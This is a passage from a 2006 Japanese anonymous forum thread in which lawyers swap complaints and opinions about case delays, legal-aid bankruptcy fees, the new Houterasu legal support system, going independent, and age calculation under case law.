682 :無責任な名無しさん:2006/07/15(土) 11:50:05 ID:COcEK21Y
北朝鮮弁護士会のことだろw

683 :MS754 ◆yGUnQdhyV2 :2006/07/15(土) 17:18:34 ID:XLEmTL0L
本日の果物

ぶどう 1s(ピオーネ)

累計

メロン 6個  サクランボ 4パック(佐藤錦)  マンゴー 3個
ミカン 1箱(15s)  ぶどう 1kg(ピオーネ)



684 :無責任な名無しさん:2006/07/16(日) 07:40:19 ID:w1tmu4oU
弁護士に委任状を書いて、着手金も支払い済・・・
それは3月の出来事でした・・・
訴訟を起こしますが、遅れに遅れて、延期
経緯を作成し、必要だという証拠も提出済・・・
まだ、訴状を出してくれないのですが・・・
このようなものですか?弁護士は、すいません、を言い続け…
予定では5月に訴状を出す予定でした

685 :無責任な名無しさん:2006/07/16(日) 07:46:05 ID:scNnpdkx
もみ消しが得意な弁護士会にでも相談されてはどうでしょう

686 :無責任な名無しさん:2006/07/16(日) 08:13:37 ID:Trx8WBTK
>>684
事件による。

金銭払えだったら、遅延損害金5%が加算されるから、すぐに解決を望んでいないなら放っておいていいかも。
いい利殖になるよ。
もし時効になったら弁護過誤として全額弁護士に出してもらえばいい。

687 :無責任な名無しさん:2006/07/16(日) 10:30:22 ID:Tw5kDb+T
俺じゃないだろうな
って一瞬思って焦る

ま、ろくな説明もしないのなら、一度弁護士にはっきり言ってみたらどうですか

688 :無責任な名無しさん:2006/07/16(日) 13:21:49 ID:WZnwZ+pj
忙しいと,期限のない仕事は先送りされるもの。

689 :無責任な名無しさん:2006/07/16(日) 13:31:25 ID:Xm38J0Q7
期限が来るものから仕事しないと回らない。・・・・・・・・・・_| ̄|○ 

690 :無責任な名無しさん:2006/07/16(日) 18:50:30 ID:hE990tvy
弁護士何か所詮無謀な金取り上げてるだけじゃねぇか。

カストロでさえ弱者のために弁護したっていうのに。

691 :無責任な名無しさん:2006/07/16(日) 20:16:42 ID:t80xkQ0p
カストロってスカトロのこと?

692 :無責任な名無しさん:2006/07/16(日) 20:27:51 ID:A/z+Elhz
http://headlines.yahoo.co.jp/hl?a=20060716-00000008-mai-soci

誰かやってやれよ。

693 :MS754 ◆yGUnQdhyV2 :2006/07/16(日) 20:40:57 ID:+cGAz7jR
本日の果物

ミカン 1箱(5kg)

累計

メロン 6個  サクランボ 4パック(佐藤錦)  マンゴー 3個
ミカン 2箱(5sと15s)  ぶどう 1kg(ピオーネ)



694 :無責任な名無しさん:2006/07/16(日) 23:53:33 ID:w1tmu4oU
事件による。
とは?事件でなく、不法行為による損害賠償なのですが・・・
連休があけたら弁護士に連絡してみます


695 :無責任な名無しさん:2006/07/17(月) 00:13:33 ID:btwA7Bzt
>>643
遅レスですまんが。
4月1日生まれの人は、3月31日に年をとるから。
つまり、誕生日の前日に歳をとるというのが、判例。
法律は、期間計算については厳格なんだよな。
最判54.4.19

696 :無責任な名無しさん:2006/07/17(月) 08:18:43 ID:bqzX1qyh
>>695
厳密に言うと3/31から4/1に変わる瞬間に歳をとる。
だから4/1生まれは前の学年に算入される。


697 :無責任な名無しさん:2006/07/17(月) 21:21:37 ID:ktyGhjOe
今更突然守秘義務を言いだしてもなあ・・・・
休みだったので昼のワイドショーを久々にじっくり見たが・・・・
これまで喋ってたのに突然黙ると非難倍増・・・・

698 :無責任な名無しさん:2006/07/17(月) 21:44:04 ID:EqbRezzX
3日かかって嫌な事件の訴状をやっと書き終えた。
ほとんどは「もうこんな事件嫌だよ〜」と言ってウダウダしてたんだけど。
他の仕事は何もできんかった。はぁ。

699 :無責任な名無しさん:2006/07/17(月) 22:04:21 ID:ktyGhjOe
拙者も人間的にどうなんだ?と思うような依頼者の訴状を本日起案。
請求として立たないわけではないが人間性を疑う請求の趣旨。
裁判所に変に思われたくないが,致し方ない・・・。

700 :無責任な名無しさん:2006/07/17(月) 22:12:34 ID:hqqDRl1Z
>>698 >>699
 弁護士って、自由業ってジャンルじゃなかったっけ?

701 :無責任な名無しさん:2006/07/17(月) 22:14:57 ID:TIoXvHqG
http://news.livedoor.com/webapp/journal/cid__2210306/detail?rd

精神科医 見てきたような 嘘をいい

702 :無責任な名無しさん:2006/07/18(火) 00:21:07 ID:Wa79ijEN
ああ〜、確かに嫌な事件って、起案や事件処理が進まないよね。
集中してやれば1、2時間くらいでできることを1日がかりで
やっと終わらせるとか、よくある。
まあ、でも、それはそういうもんだと思えるようにはなってきたかな。

703 :無責任な名無しさん:2006/07/18(火) 11:47:32 ID:EWr7Cryr
>>700
もう違う。
マジで数年以内に辞めようと思ってる

704 :無責任な名無しさん:2006/07/18(火) 11:57:40 ID:AHN/aQUp
まあ、嫌な事件はカネを付き返して辞任する自由は残されてるから、自由業ではあるわな。


705 :無責任な名無しさん:2006/07/18(火) 12:04:41 ID:EWr7Cryr
ヘタに辞めたら懲戒になる今日この頃な気がするよ
辞めるって言っても,先生にお願いしたいって言い続ける依頼者もいるしね

706 :無責任な名無しさん:2006/07/18(火) 12:06:37 ID:BD+q7psa
だから最初が肝心
イヤな仕事はできるだけ断る


707 :無責任な名無しさん:2006/07/18(火) 12:48:11 ID:NSdoiu/V
イヤな感じがする人の事件依頼は必ず断る。

事件自体簡単明白でも、勝訴解決の時点で必ず報酬でモメルから。

708 :無責任な名無しさん:2006/07/18(火) 12:49:07 ID:o8Fmg5M6
イソ弁の場合は受任の自由もない。
さんざん受けるべきでないと進言しても受けろと言われたら受ける。
さんざん進言したが、いざ結論近しになると訴訟追行が下手だったんじゃないか
と嫌みを言われた。それ、最初っから指摘してたんですけどいいから受けろ
ってあなたが言ったんじゃないですか orz

709 :無責任な名無しさん:2006/07/18(火) 12:55:18 ID:BD+q7psa
みんな多かれ少なかれ経験してきたことだ
我慢しろ

710 :無責任な名無しさん:2006/07/18(火) 12:58:39 ID:3RWxb5Vy
独立しろ。今後はますます難しくなるぞ。

711 :無責任な名無しさん:2006/07/18(火) 13:49:50 ID:RAmpeAbE
 秋田の殺人事件は、また弁護人が会見するのだろうか・・・。

712 :無責任な名無しさん:2006/07/18(火) 13:59:10 ID:BD+q7psa
若い方の人ってなんか漫画みたいな顔してるね

713 :無責任な名無しさん:2006/07/18(火) 14:27:47 ID:EWr7Cryr
以下はチラシの裏だが,

俺は中?小?規模会の弁だけど,マジで独立するか弁護士辞めるか悩んでる。
一応独立できる資金的な目処はついた。
けれど,将来が全くわからない。法テラスに良いようにされる人生を送るハメになるのかも知れない。
30半ばの年齢でもあり,しばらく様子を見ている時間的余裕はないように思う。
弁護士以外の仕事の当ては,一応ある(本気で確認したわけではないけど)

隣の芝生が緑に見えているだけなのかどうか分からないけど,独立するリスクと転職のリスクが余り違わないように思える。
で,懲戒だの公的活動だのいろいろやかましい環境で,後ろ向きの生活を送るのよりは,よほど前向きな人生が送れそうだ

けど,独立したら,弁護士になってやりたかったことをできるだろうし,転職したら無理かも知れない。
おまけに,しばらくは間違いなく弁護士の方が収入が良い。
でもそのうち,生活のためにやりたくもない仕事をダラダラ続ける人生になっちゃうかもしれない。

ある朝起きたら辞めるぞ!と思い,次の朝には続けようと思う。

などと,うだうだ悩んで3連休を過ごした。

714 :無責任な名無しさん:2006/07/18(火) 14:30:20 ID:BD+q7psa
とりあえず独立してみてイヤなら辞めればよい

715 :無責任な名無しさん:2006/07/18(火) 17:17:49 ID:ZCBty5nH
弁護士資格はこれから運転免許証と同じになる。
持ってるだけではメシは食えない。問題は自動車を運転して何をするかだ。
一生雇われ運転手でいくか。個人タクシーになるか。運送会社やタクシー会社を起こすか。
自動車を活かして何か新しく起業するか。徹底的に考えないとな。
漫然と独立したら行き詰まるよ。

716 :無責任な名無しさん:2006/07/18(火) 17:22:18 ID:lMcZMF/d
>>715
まあ,運転免許というのはちと違う気がするが,社労士,行政書士と余り変わらない有り難みになることは
確実か....

717 :無責任な名無しさん:2006/07/18(火) 19:53:00 ID:XtbM6RnT
そこで弁政連ですよ。政治献金ですよ。
少しはワルになって既得権益を守る努力をしないといけない。

718 :無責任な名無しさん:2006/07/18(火) 19:55:12 ID:XtbM6RnT

241 名前: 無責任な名無しさん [sage] 投稿日: 2006/07/18(火) 13:23:06 ID:jOnfWg+r
 「お弁当の賞味期限切らす」というのも服務規律違反らしいね。やってらんないよ。
 「調整期間(6月から法テラス移行準備のため,国選受任のやり方を変えた)」で,1回だけ国選やったけど,10月2日から清々するね。

ってのを見たけど,マジ?
執行猶予期間満了間近でダラダラ控訴したら懲戒ですか?
いっそのこと服務規程違反で法テラスから国選受任欠格の烙印を押して貰った方が良いのかも。

719 :無責任な名無しさん:2006/07/18(火) 20:04:00 ID:mUT5kncy
ところで、話が飛んで申し訳ないが、窃盗の弁護で罰金になった
ケースを経験した人っていますか?

720 :無責任な名無しさん:2006/07/18(火) 21:04:38 ID:DlxB1V4H
ロー卒1期の馬鹿と一緒にされたくないな。

721 :無責任な名無しさん:2006/07/18(火) 22:15:08 ID:Qp8CJ5/d
>>696
正確には、3月31日の午後12時に歳をとる。
しかし、年齢は日単位なので、結局3月31日の午前0時に歳をとることになる。
ってのが、判例です。

722 :無責任な名無しさん:2006/07/18(火) 22:29:02 ID:Qp8CJ5/d
最判昭54.4.19が上告棄却として是認した原審によれば、

控訴人は、明治四五年四月一日出生の同人が満六〇才に達するのは、昭
和四七年三月三一日の満了によるものであるから、出生日の前日である同年三月
三一日でなく、同年四月一日であり、同人が昭和四八年三月三一日に退職するに
際しては勧奨退職の取扱いがなされるべきであつたと主張する。しかしながら、明
治四五年四月一日生れの者が満六〇才に達するのは、右の出生日を起算日とし、六〇年
目のこれに応当する日の前日の終了時点である昭和四七年三月三一日午後一二時で
あるところ(年令計算に関する法律・民法第一四三条第二項)、日を単位とする計算の
場合には、右単位の始点から終了点までを一日と数えるべきであるから、右終了時点を含
む昭和四七年三月三一日が右の者の満六〇才に達する日と解することができる。

723 :無責任な名無しさん:2006/07/18(火) 23:53:14 ID:jOnfWg+r
>>719
 第1号事案があったら,ジモティ単位会から日弁に報告を挙げてくれっちょ。
 「2週間ぐらい我慢したらシッコウユーーヨーー求刑してあげるからねぇ」と因果を含めて,因果性のない(失礼)任意性のない検面に同意する。そういう制度なのよ。
 私は,10/02(呆テラス開業日)意向,国選を拒否することにしたけども,東京当たりでは,失対弁護士事業になるのだね。

724 :無責任な名無しさん:2006/07/19(水) 00:12:49 ID:vSSERKIF
>>722

「勧奨」かい。偶然の言葉の重なり合わせかも知れないけど,これから単位会執行部とか刑弁委員会が「崩テラス非提携弁護士」の切り崩し工作に行くかも知れないね。
「非提携弁護士」てなんて略称すればよいのか?

725 :無責任な名無しさん:2006/07/19(水) 00:21:48 ID:vSSERKIF
 なんかだんだんと暗い話になっていくけれども,東京の若手の弁護士は,
国選(早く終わりそうな楽な事件)を「取りに行くため」朝の7時ころか
ら,クレオの前で行列を作っているって本当の話なのか?
 僕らの年代のころは「粋の良い放火はないか。粋の良い難しそうな国選
はないか。勉強になるようなキティ3の事件はないか」事件あさりをしていたのだね。

726 :無責任な名無しさん:2006/07/19(水) 00:24:29 ID:FejpC14Z
>>725
そんなことはありません。すくなくとも答弁はないです。

727 :無責任な名無しさん:2006/07/19(水) 00:36:41 ID:AeJ5tnBe
>>719
http://headlines.yahoo.co.jp/hl?a=20060630-00000232-kyodo-soci
他に、何件くらいあるんだろうか?

728 :無責任な名無しさん:2006/07/19(水) 00:47:50 ID:FejpC14Z
窃盗罰金は略式だろうから弁護人がつくことは少ないと思われ
被疑者弁護だったらあり得るかも試練けど

729 :無責任な名無しさん:2006/07/19(水) 01:05:19 ID:L0/WnSUd
戸籍情報を原則非公開に 弁護士に理由明示義務化
2006年 7月18日 (火) 18:04

法制審議会(法相の諮問機関)の「戸籍法部会」は18日、
戸籍情報を原則非公開とし、弁護士ら専門職や国、
自治体などが戸籍謄本、抄本を職務上必要とする場合でも、
交付請求の際に理由を証明するよう義務付ける
戸籍法改正要綱の中間試案をまとめた。

弁護士らの不正取得事件が相次いだことや、
国民のプライバシー意識の高まりに応えるのが狙い。
国民の意見を募った上で年内に要綱案を決定し、
法務省は来年の通常国会に改正案を提出する方針だ。

ただ、弁護士らに証明を義務付ける事項は意見がまとまっておらず、
試案では(1)依頼人の氏名と請求理由(2)請求理由のみ
(3)使用目的と提出先−の3案を併記。
また無条件に謄抄本を取得できる「本人」
の定義については(1)戸籍に記載されている者
(除籍者を含む)のみ
(2)記載されている者と配偶者、
直系の親族−の2案を提示した。



730 :無責任な名無しさん:2006/07/19(水) 01:07:09 ID:L0/WnSUd
「弁護士ら」ってなんだよ。
不正請求してんのは書士だろうが。
共同は書士会から金でももらってんのか?

っていうか,こんなの死んでも阻止しろよな,執行部。
おまえら何のために存在しているんだ?

731 :無責任な名無しさん:2006/07/19(水) 01:17:10 ID:s/HGlK2e
>>730
不正請求して懲戒食らったのはいたなあ

732 :無責任な名無しさん:2006/07/19(水) 01:22:48 ID:Tk79g0m2
クレサラに横流しをしただけじゃなく暴力金融に横流しした香具師だね

733 :無責任な名無しさん:2006/07/19(水) 03:40:59 ID:xdt6hk15
>>725
>勉強になるようなキティ3の事件はないか
現在では、懲戒手続の勉強になるでしょう。

734 :無責任な名無しさん:2006/07/19(水) 09:39:21 ID:hlz0u2Dn
今では、そういう難しい事件がやれる環境にいる弁護士は少なかろ。
はっきり言って、独立したら難しい国選弁護をやってる時間はない。一人事務所でそんなのやったら、
事務所が回っていかない。
だけど、今はイソ弁にそれだけ自由に国選事件やらせる事務所はないだろ。
ボスが小規模単位会の執行部にいるイソ弁ぐらいしか、そういう事件に時間をかけても収入・仕事両面で問題ない弁護士はいないだろうなあ。

俺もややこしい事件やったことあるけど、これはボスが小規模単位会の執行部にいたから文句いわれなかっただけだもんなあ。
弁論要旨書くとき、完全に事務所の仕事を1週間程度放り出したもん。

735 :無責任な名無しさん:2006/07/19(水) 11:29:49 ID:Wckxhm15
>>719
ないね。
こちらが実刑でしょうがないなと思っていた少額の窃盗事件で,検察官が論告で罰金にすべきではないというのを延々述べていたときには,「そうか理屈上罰金はあり得るのか」とは思った。
検察官は警戒してるみたいだね

ま,判決も実刑だったけど

736 :無責任な名無しさん:2006/07/19(水) 11:31:26 ID:Wckxhm15
>>730
オウムで有名になった弁護士が,芸能人の戸籍を取ってテレビ局関係者に渡していたというので懲戒食らってたよ

弁護士界の足引っ張ってるね

737 :無責任な名無しさん:2006/07/19(水) 11:48:14 ID:EnZtneBb
破産の相談を受けたが、本当に金がない人だったので扶助協会を紹介した。
扶助なんかでやってられないので、俺は忙しいと言って受任を断った。協会の職員に
悪いねえと一応頭を下げたが、職員は「いや、いや、扶助の破産を受けたいと待っている
人がたくさんいるんですよ。構いませんよ」と言ってた。いるんだね。扶助の破産でも
したい仕事がない弁護士って。ほんとびっくりしたね。


738 :無責任な名無しさん:2006/07/19(水) 11:55:59 ID:fR5oq7KU
>>737
キリギリス君か
扶助の破産でも月50万くらいになれば小遣いにはなるよ

739 :無責任な名無しさん:2006/07/19(水) 11:56:42 ID:lXsp0gG0
本当は正義と理想のために戦いたい。

740 :無責任な名無しさん:2006/07/19(水) 12:37:53 ID:CG0fVA4M
イソ弁なら扶助でも国選でもペイするんじゃね?

741 :無責任な名無しさん:2006/07/19(水) 13:02:07 ID:Wckxhm15
>>737
東京都下の大都市ではそうなんだろう
国選ですらオイシイと言ってる奴を見たことがある

>>740
イソなら良い小遣いになるね

742 :無責任な名無しさん:2006/07/19(水) 14:02:26 ID:xb10sX0c
>>738扶助の破産で月50万円てどういうことですか?月3件受けるということですか。それはさておき私はこれからは扶助と国選とヤミ金は全部崩テラスに回す方針です。

743 :無責任な名無しさん:2006/07/19(水) 14:29:15 ID:Wckxhm15
>>742
そういうこと言ってると,古い弁護士は金が儲かる仕事しかしないから,やっぱり司法改革が必要
って言われるよ

744 :無責任な名無しさん:2006/07/19(水) 14:44:13 ID:xb10sX0c
崩テラスには若くて丈夫で優秀な人材があつまるからいいんじゃないですか。老兵は消え去るのみ。

745 :無責任な名無しさん:2006/07/19(水) 14:45:05 ID:l2Q7RRD3
>>742
扶助の自己破産って、1件当たり10万円ぐらいにしかならなかったように思うんだが。
東京では、1件で20万近くもらえるの?いいなあ。

小さい単位会じゃ、法テラスへの登録が義務化する傾向だというのに。もう、いくつかの単位会は義務化したらしい。
うちも高齢の大御所除いて義務化するみたい。

746 :無責任な名無しさん:2006/07/19(水) 14:50:14 ID:EnZtneBb
金が儲からなくともよいが、「仕事」である以上、少なくともペイしなれば
ならない。国選も扶助もペイしないから(除くイソ弁の場合)、「仕事」とは
言えない。単なるボランティアに過ぎない。俺たちはマザーテレサではない。
国選や扶助の担い手が少ないのは、弁護士の数が少ないからではない。ペイしない
エセ仕事だからだ。増やすべきは法曹人口ではなく、国選扶助の予算だろう。


747 :無責任な名無しさん:2006/07/19(水) 15:33:07 ID:CG0fVA4M
法テラスの義務化って憲法違反じゃん
問題にならないの?

748 :無責任な名無しさん:2006/07/19(水) 16:01:19 ID:Wckxhm15
じゃあ裁判しなよ

749 :無責任な名無しさん:2006/07/19(水) 16:40:49 ID:VsYavWnR
おっ、746がいいこと言った。

750 :無責任な名無しさん:2006/07/19(水) 16:54:11 ID:rc/Q8/Xv
http://hochi.yomiuri.co.jp/topics/news/20060715-OHT1T00022.htm

管財人報酬どのくらいになるかな〜?

751 :無責任な名無しさん:2006/07/19(水) 16:57:04 ID:Wckxhm15
1割くらいはあげても良いように思うけどむりかな
それでも10パーセント配当だな

752 :無責任な名無しさん:2006/07/19(水) 17:00:12 ID:rc/Q8/Xv
>>745
扶助の自己破産事件は実費と報酬あわせて17万くらいだった気が。

753 :無責任な名無しさん:2006/07/19(水) 17:36:19 ID:E2OvCYo8
法科大学院の現実2006-07-14

 ロースクール研究No.1(民事法研究会)という雑誌がある。
 この雑誌のコラムに、「オンレコ・オフレコ ロースクールの光と陰 K&Cの亡霊と伴に!」というのが掲載されている。
 司法試験予備校にどっぷりつかった旧司法試験転身組がKとかCとかいう名前の予備校本を法科大学院でも使っていて、
はじめは授業をリードして旧司法試験となんらのかかわりもなく法科大学院に来た未修者に羨望の目でみられるが、すぐに
化けの皮がはがれて、法科大学院の教授の指導どおり勉強している完全未修者に瞬く間に抜かれていくというような「夢の
世界での物語」が書かれたコラムである。
 言うまでもないが、まったくもって現実はこのコラムとは異なるのである。
 法科大学院では、法律の基礎知識も何もない完全未修者は、KとかCとかいう予備校本を使わないように徹底的に指導さ
れ、高度な判例評釈や学者の難解な基本書をいきなり読むように言われる。
 意欲と能力のある学生ほどこれに忠実に従っている。
 講義用レジュメも、これが法律の知識のまったくない人を前提としたレジュメかというほど高度である。
 基礎的な土台がまったくないままにこれらの高度な学習の場に放り込まれるのである。
 幼稚園児がいきなり大学院の講義を聴いているのと同じである。
 何が起こるかは「司法試験を突破した経験をもつ人」なら誰でもわかることであるが、永遠にKとかCを使う旧司法試験転身
組との差が埋まらないのである。
 というか、逆にどんどん差が開いていくのである。差を埋めようがないほどにである。
 KとかCとかをうまく使える人は、法科大学院の先生の与える教材もうまく料理して自分のものにしている。
 完全未修で法科大学院へ入学してしまった人は、プロセス評価に脅え、授業の合間に実施される小テスト、レポートに振り
回され、自分の勉強をまったく行うことができず3年になってあわててKとかCを買ってくるのである。
 しかし、その人たちにとって、それらを読むべき時はもはや過ぎ去ってしまったあとなのである。(K.I)

754 :無責任な名無しさん:2006/07/19(水) 17:36:41 ID:fR5oq7KU
>>752
実費も合せれば(本当に郵券とかは負担しなければならないんだけど)20万弱は行くよ。
ただ報酬回収率は限りなくゼロに近いので....実際は14・5満程度か。
3・4件やって,面接で2時間弱で申立書を完成させ,後は事務局作業部分(受任通知等)以外は
免責審尋だけなら何とかペイするでしょ。
その点国選とは違う。
 まあ,一件100万円以下(報酬等)の事件は本来はやりたくないが,最低経費分の一つとして
やればいいでしょ(外に顧問料や何かで案定収入作る手段の一つ)。

755 :無責任な名無しさん:2006/07/19(水) 17:36:56 ID:Y7VMO0j8
共謀罪とGK法にレッドカードのシールをパソコンに貼ったお

756 :無責任な名無しさん:2006/07/19(水) 17:52:22 ID:AP8N4np3
>753
 KとかCってどこだろう?
 予備校といえば、IとLとTとWしか知らないのだが。ローカルな予備校があるのかな?

>754
 扶助の破産って、債権者数で変わるけど、12万6000円(弁護士分)と2300円(実費分)となることが多い気がする。
んで、予納金(同廃で11000円ぐらい)以外の実費は2万3000円から出さなければならず、本人からは貰ってはいけないはず。
 以上とは別に本人から報酬をもらえましたっけ?扶助協会の支部ごとに違うのかな?

757 :756:2006/07/19(水) 17:54:25 ID:AP8N4np3
>2300円は2万3000円の誤記です。失礼。

758 :無責任な名無しさん:2006/07/19(水) 18:00:10 ID:l8cuEAj/
Kってなんだ?
CはCBOOKだろうが。

759 :無責任な名無しさん:2006/07/19(水) 18:00:10 ID:E2OvCYo8
>>756
KとCは、本の名前でしょ。

760 :756:2006/07/19(水) 18:24:44 ID:AP8N4np3
 そうか、本の名前か。と言われても何の本だかさっぱりわからねぇや。
余談だけど、Wの発行していたAという雑誌に載っていた4コマ漫画が好きだった。作者も受験生だったと記憶しているが、今は法曹になられているのだろうか?

761 :無責任な名無しさん:2006/07/19(水) 18:44:52 ID:+vzjxQ8Q
>>756
破産申し立てで報酬なんてもらえない。
ちなみに当職は大阪。

762 :無責任な名無しさん:2006/07/19(水) 19:05:36 ID:EnZtneBb
>753
ネタだろう。どうせロースクールの宣伝記事。
ロースクールでそんなに凄い教育ができるはずがない。


763 :無責任な名無しさん:2006/07/19(水) 19:06:24 ID:iAEM8qBE
ところで今日って何か法律関係の記念日だったのか?
東京地裁にいろんな学校の
制服を着た女子高生がいっぱい来ていた。

おまけに男子高校生も来ていた。
男子高校生は法廷傍聴なんかしなくてよろしい。

764 :無責任な名無しさん:2006/07/19(水) 19:17:58 ID:CQWxEhvn
扶助は、免責が出ると、報酬は5万円。
これは、本人から直接もらう。
ただし、生活保護を受けている場合を除く。

765 :無責任な名無しさん:2006/07/19(水) 19:23:57 ID:vSSERKIF
 明後日の国選で,見学者が20人くらい来るとの予告があった。
で,いつもの立会検事(女)でなく,先輩格の女検事を立会させる
のだそうだ。別にどうということもない事件なんだけどね。
まぁ,休みの都合とかかも知れないけど。


766 :無責任な名無しさん:2006/07/19(水) 19:27:52 ID:Tk79g0m2
>>765
ウチは逆に若い美形グラマPに交代でラッキ!
おばさんPは疲れるしねw

767 :無責任な名無しさん:2006/07/19(水) 19:42:33 ID:xJl97bBn
きもい傍聴マニアよりはまし。

768 :無責任な名無しさん:2006/07/19(水) 19:45:46 ID:XwQZsN0m
>>764
本人から報酬をもらうことができるのですか?

769 :無責任な名無しさん:2006/07/19(水) 19:47:50 ID:AeJ5tnBe
>>760
めでたく合格なさったはず。
4コマ漫画は、出版もされた。
ていうか、私持ってる。

770 :無責任な名無しさん:2006/07/19(水) 19:54:19 ID:3p4Cuix7
>>763
いたねー。
しかしおまえの書き方が妙に清々しい。

771 :無責任な名無しさん:2006/07/19(水) 19:54:42 ID:E2OvCYo8
>>761
破産の報酬は、債務者の直払いだ。
お主、扶助の契約書読んでないな。

772 :無責任な名無しさん:2006/07/19(水) 19:56:09 ID:FejpC14Z
扶助のときでも、過払いが発生していることが多いから、過払い金の報酬もらって
だいたい50万円くらいは手に入るよ

773 :無責任な名無しさん:2006/07/19(水) 19:57:56 ID:+vzjxQ8Q
>>771
よく読んでない。スマン。
破産の扶助は生活保護のしかやってなかったからかもしれん。

そういえば一般事件で報酬はもらった。

774 :無責任な名無しさん:2006/07/19(水) 19:59:06 ID:vSSERKIF
 「自己破産は減っている」って都会ではそうかも知れないけど,
地方では違うよね。だいたい,景気が良くなったなんて言う実感
はないし,格差(容認)社会の訳で,自己破産は,うちの事務所
では現に増えているし,これからも増えるね。先月なんか5−6
件(扶助も結構あった)受けてしまって,事務員さんに怒られた。
「事務員さんに怒られた」といっても当方は,一応,経営弁護士。
事務員さんがマネージャーで弁護士はタレントみたいな関係。

775 :無責任な名無しさん:2006/07/19(水) 20:05:16 ID:vSSERKIF
>>765
 女Pって,テンション高い姉さんが多い。いつもの立会検事は
スレンダーでちょっと不良っぽい感じで−秋田の例の被疑者に少
し似ている−好感が持てるのだけど(集団強姦致傷の主任でセク
ハラまがいの意見書出したらパイにしてくれた)その姉さんのP
が異様にテンションが高く,しゃべり出すと止まらないんだ。
 当職は,この女検事コンビと模擬裁で相手をして体を壊した。
 二人ともお水の源氏名みたいな名前なんだ。

776 :無責任な名無しさん:2006/07/19(水) 20:21:42 ID:E2OvCYo8
>>775
>二人ともお水の源氏名みたいな名前

さやかだ。さやかだろ。

777 :無責任な名無しさん:2006/07/19(水) 20:26:45 ID:/7jhhYXX
このスレって、♂弁の書き込みばかりのように見えるけど、
♀弁も書き込んでたりするんだろうか?

778 :無責任な名無しさん:2006/07/19(水) 20:37:03 ID:vSSERKIF
>>776
 のど元まで出かかってるけど,ばらしたらたちどころに特定(当該P,当該D)されて,朝会になるので,止めておく。 

779 :無責任な名無しさん:2006/07/19(水) 21:54:59 ID:vSSERKIF
 誰か,関係方面に「鷽・古代」で摘発してくれ。崩テラスに「変な抗告がありました」とチクルのが,最良策か?

http://www.nichibenren.or.jp/ja/judical_support_center/zadankai.html

780 :無責任な名無しさん:2006/07/19(水) 22:04:38 ID:FejpC14Z
>>774
そんなときは、弾き直し計算は外注ですよ。
氏名やらは消すので、守秘義務違反にも奈良ならないし。

781 :無責任な名無しさん:2006/07/19(水) 23:55:47 ID:ITsgYKkh
>>780
破産でなぜ引き直し計算かと小一時間(ry

782 :無責任な名無しさん:2006/07/20(木) 00:35:22 ID:U8UFiy0O
>>781
破産の場合も、過払は取り返してるよ。
サラ金の残高も、引き直し計算した残高を計上してる。そのまま計上すると
損金処理の税金でサラ金業者が得をする。

サラ金業者に、違法な利得をさせるわけにはいかない。

783 :無責任な名無しさん:2006/07/20(木) 00:38:08 ID:U8UFiy0O
というか、債務整理か破産かを見分けるために、引き直し計算はやるだろっ!

784 :無責任な名無しさん:2006/07/20(木) 01:41:33 ID:OpCS2Zbz
716 :氏名黙秘 :2006/07/19(水) 12:27:05 ID:???
法セミで慶応の平木教授は、試験後の謝恩会での学生の明るさから
かなりの手ごたえを感じてるらしい。8割以上は合格してほしいと語っているよ。
これからすると、慶応はかなりいいんじゃないかな

718 :氏名黙秘 :2006/07/19(水) 13:11:02 ID:???
 マジな話、慶應は8割いくと思う。教授の方も「今年は落ちる人はほとんどいない」
と予想してるみたい。

719 :氏名黙秘 :2006/07/19(水) 13:17:54 ID:???
恐るべし慶応!

785 :無責任な名無しさん:2006/07/20(木) 01:48:14 ID:HEK8ydti
>>781
破産でも過払は取り返すが,過払にならない債権者については引き直しはしないな。
ところで,債権者一覧表にいくらで載せるかでサラ金の税金が変わるの?
債権者一覧表って別に債権者に送られないから関係ないのでは?

>>783
全部はやらない。引き直しは過払になりそうなところだけ。

786 :無責任な名無しさん:2006/07/20(木) 08:41:42 ID:+OmsN7Ly
>>771
大阪では破産で報酬はもらえないよ。
扶助の条件は支部ごとに結構違う気がする。

787 :無責任な名無しさん:2006/07/20(木) 09:44:42 ID:dt/zxp/6
大阪は最悪! いい格好しいというか、建前好きというか、レフトな先生が多いから
弁護士会法律相談センターが定める破産等の報酬規定はおそらく東京の半額ぐらい。
センターの定める規定が事実上標準となるから、弁護士費用の低額化が進む。


788 :無責任な名無しさん:2006/07/20(木) 09:45:54 ID:oNo2cgwT
法テラスの業務解説書が弁護士会に届いたらしい。
ウチは小規模単位会だから、半ば義務的に契約しなければならんらしいが、
それでも反対派から来たファックスで「示談成立ならは報酬加算だけど、無罪や保釈は
加算事由にならない。」とか書いてあると、やっぱり腹立つなあ。



789 :呆テラス所長:2006/07/20(木) 09:52:06 ID:dt/zxp/6
無罪や保釈はPにとってウザイ、なるべく減るように本当は減額事由にしたかったことろだが、
露骨すぎるので今のようにした。ありがたいと思え。

790 :無責任な名無しさん:2006/07/20(木) 10:29:15 ID:xPQU3NpF
すみません。当方非弁ですが、質問します。

当方民事訴訟の原告ですが、次回和解協議期日です。

和解を急かす弁護士や裁判官がいるらしいのですが、和解で気をつけるべきことはありますか?

791 :ANNA:2006/07/20(木) 10:51:03 ID:LHcwjjQs
栃木県のN市のY老人ホームで、利用者さんたちに暴力は振るうし、鼻に指を突っ込んで息できなくするし、ボールペンで顔に落書きするし、いろいろやっています。
職員の連絡網を廊下にはってあるし、個人情報保護法にひっかからないのでしょうか?
ホームページは2003ねんのままだし***
私は、県と国に通じているから、報告して別な老人ホームなどに移ります。

792 :768:2006/07/20(木) 10:53:20 ID:vDzyFI3l
>>771
話の内容だと相手の家族は常識では考えられない精神状態を持っているようですね。
これ以上あなたから相手に接触する事は避けた方がいいと思う。
やむを得ず電話連絡等をする場合は、774さんと同意見だが録音をお勧めする。
ちなみに家庭電話機から直接録音するには「ソニーのテレホン録音アダプターTL-RH30」1000円程?と「ソニーのIC RECORDER ICD-B15」20000円程度?がいいよ。
雑音無しに録音できるからね。



793 :768:2006/07/20(木) 10:54:53 ID:vDzyFI3l
スマン、誤爆した。

794 :無責任な名無しさん:2006/07/20(木) 10:56:23 ID:Xpitm0Fz
 法テラスの関係ですが、保釈は、国選でメシを食っているような人が、無意味な保釈を乱発しかねないという懸念も分からないではないが(建前上は、保釈はやって当たり前なので基本料金に含むということだろうけど。)、
無罪は解せないね。実際は、無罪判決を貰うような事件は、公判回数も増えるだろうから、報酬は大きくなると思うけど。

 ところで、現行の国選は保釈加算とか無罪加算はあるのだろうか?それがないなら、前提がひっくり返るけどね。

795 :無責任な名無しさん:2006/07/20(木) 11:35:48 ID:xLoNd/Uv
保釈加算って,保釈請求によって加算?それとも保釈決定によって加算?
それ次第で大きく違う。

796 :無責任な名無しさん:2006/07/20(木) 12:11:09 ID:Xpitm0Fz
